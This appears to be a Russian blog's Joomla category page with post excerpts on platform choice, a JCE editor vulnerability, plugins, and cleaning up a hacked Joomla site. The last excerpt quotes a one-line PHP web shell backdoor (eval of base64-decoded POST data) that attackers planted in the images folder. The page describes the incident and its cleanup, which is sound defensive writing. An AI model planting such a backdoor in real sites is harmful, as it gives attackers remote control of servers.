Рубрика: Joomla

Сезонный мандраж в выборе очередной платформы для блога

Сезонный мандраж в выборе очередной платформы для блога

В предверии выхода Drupal 8 (ну, он ж скоро выйдет )) У меня начался приступ оптимизации того, в чем я веду свои публикации в интернете. Если посмотреть приблизительную хронологию, то получится что-то типа Joostina -> Joomla 1.5.x -> … -> Drupal 6 -> Drupal 7 До момента перехода на Drupal все мои перемещения с движка…

Read More Read More

Уязвимость Joomla с редактором JCE

Уязвимость Joomla с редактором JCE

В плагине редакторе JCE версии ниже 2.0.11 была обнаружена уязвимость и имеет место быть большая череда взломов с последующим внедрением вредоносного кода в js-файлы.Тот случай, который был виден мной, состоял из следующего кода: document.write(»); Можно попробовать выполнить следующую команду в корне директории сайта, однако она несколько грубоватая find ./ -type f -name «*.js» -exec perl…

Read More Read More

Плагин поиска по mediawiki 1.18.x для Joomla! 2.5

Плагин поиска по mediawiki 1.18.x для Joomla! 2.5

Плагин написан в замен MediaWiki Search, чья версия подходит только для использования с Joomla! 1.5.x. Автор — фрилансер с joomlaforum.ru ;) Превосходно работает с mediawiki 1.18.x и Joomla 1.7.x. Надеюсь, будет работать и с 2.5.х веткой Joomla.  

Добавить социальные кнопки в Kunena 1.7.x

Добавить социальные кнопки в Kunena 1.7.x

Вспомнилось, что все хотел добавить на форум возможность делиться с друзьями ссылками на темы посредством социальных сервисов и сетей. В репозитарии расширний Kunena даже был найден плагин, но каково было мое огорчение, когда он оказался платным. В качестве основы я взял блок «Поделиться» от Яндекса. Решено было добавить кнопки с поле заголовка темы. Находим в…

Read More Read More

Взлом Joomla, внедрение бекдора и очистка от кода

Взлом Joomla, внедрение бекдора и очистка от кода

UPD 01.03.2013: Я закрыл возможность комментирования данной записи. Все вопросы по данной теме задавайте на http://ask.sabini.ch. Благодарю за понимание.   В конце 2011 года в Joomla была некая уязвимость, которая позволила злоумышленникам положить в директорию images бекдор — файл post.php, следующего содержания <?php eval(base64_decode($_POST[«php»])); ?> После чего основная масса файлов с расширением php (причем, заражалось…

Read More Read More